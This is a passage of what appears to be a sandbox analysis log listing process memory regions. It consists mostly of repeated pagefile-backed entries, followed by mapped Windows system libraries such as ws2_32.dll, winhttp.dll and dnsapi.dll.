0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 707 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 708 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 709 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 710 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 711 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 712 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 713 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 714 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 715 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 716 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 717 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 718 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 719 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 720 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 721 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 722 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 723 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 724 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 725 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 726 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 727 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 728 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 729 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 730 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 731 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 732 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 733 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 734 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 735 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 736 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 737 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 738 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 739 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 740 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 741 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 742 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 743 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 744 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 745 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 746 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 747 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 748 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 749 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 750 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 751 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 752 start_va = 0x1ea0000 end_va = 0x21d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 753 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 754 start_va = 0x4e0000 end_va = 0x4fdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 755 start_va = 0x1db0000 end_va = 0x1dbefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001db0000" filename = "" Region: id = 756 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 757 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 758 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 759 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 760 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 761 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 762 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 763 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 764 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 765 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 766 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 767 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 768 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 769 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 770 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 771 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 772 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 773 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 774 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 775 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 776 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 777 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 778 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 779 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 780 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 781 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 782 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 783 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 784 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 785 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 786 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 787 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 788 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 789 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 790 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 791 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 792 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 793 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 794 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 795 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 796 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 797 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 798 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 799 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 800 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 801 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 802 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 803 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 804 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 805 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 806 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 807 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 808 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 809 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 810 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 811 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 812 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 813 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 814 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 815 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 816 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 817 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 818 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 819 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 820 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 821 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 822 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 823 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 824 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 825 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 826 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 827 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 828 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 829 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 830 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 831 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 832 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 833 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 834 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 835 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 836 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 837 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 838 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 839 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 840 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 841 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 842 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 843 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 844 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 845 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 846 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 847 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 848 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 849 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 850 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 851 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 852 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 853 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 854 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 855 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 856 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 857 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 858 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 859 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 860 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 861 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 862 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 863 start_va = 0x4e0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 864 start_va = 0x7ffe94280000 end_va = 0x7ffe942acfff monitored = 0 entry_point = 0x7ffe94299d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 865 start_va = 0x7ffe95d20000 end_va = 0x7ffe95de0fff monitored = 0 entry_point = 0x7ffe95d40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 866 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 867 start_va = 0x7ffe95be0000 end_va = 0x7ffe95c4afff monitored = 0 entry_point = 0x7ffe95bf90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 868 start_va = 0x7ffe8cc80000 end_va = 0x7ffe8cc94fff monitored = 0 entry_point = 0x7ffe8cc82dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 869 start_va = 0x7ffe8d500000 end_va = 0x7ffe8d537fff monitored = 0 entry_point = 0x7ffe8d518cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 870 start_va = 0x7ffe8d790000 end_va = 0x7ffe8d857fff monitored = 0 entry_point = 0x7ffe8d7d13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 871 start_va = 0x21e0000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 872 start_va = 0x7ffe93ed0000 end_va = 0x7ffe93f2bfff monitored = 0 entry_point = 0x7ffe93ee6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 873 start_va = 0x7ffe8cfc0000 end_va = 0x7ffe8cfcafff monitored = 0 entry_point = 0x7ffe8cfc1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 874 start_va = 0x2260000 end_va = 0x22dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 875 start_va = 0x7ffe976b0000 end_va = 0x7ffe976b7fff monitored = 0 entry_point = 0x7ffe976b1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 876 start_va = 0x7ffe93020000 end_va = 0x7ffe930c9fff monitored = 0 entry_point = 0x7ffe93047910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 877 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 878 start_va = 0x1db0000 end_va = 0x1db2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 879 start_va = 0x1dc0000 end_va = 0x1dc9fff monitored = 0 entry_point = 0x1dc15c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 880 start_va = 0x22e0000 end_va = 0x22e0fff monitored 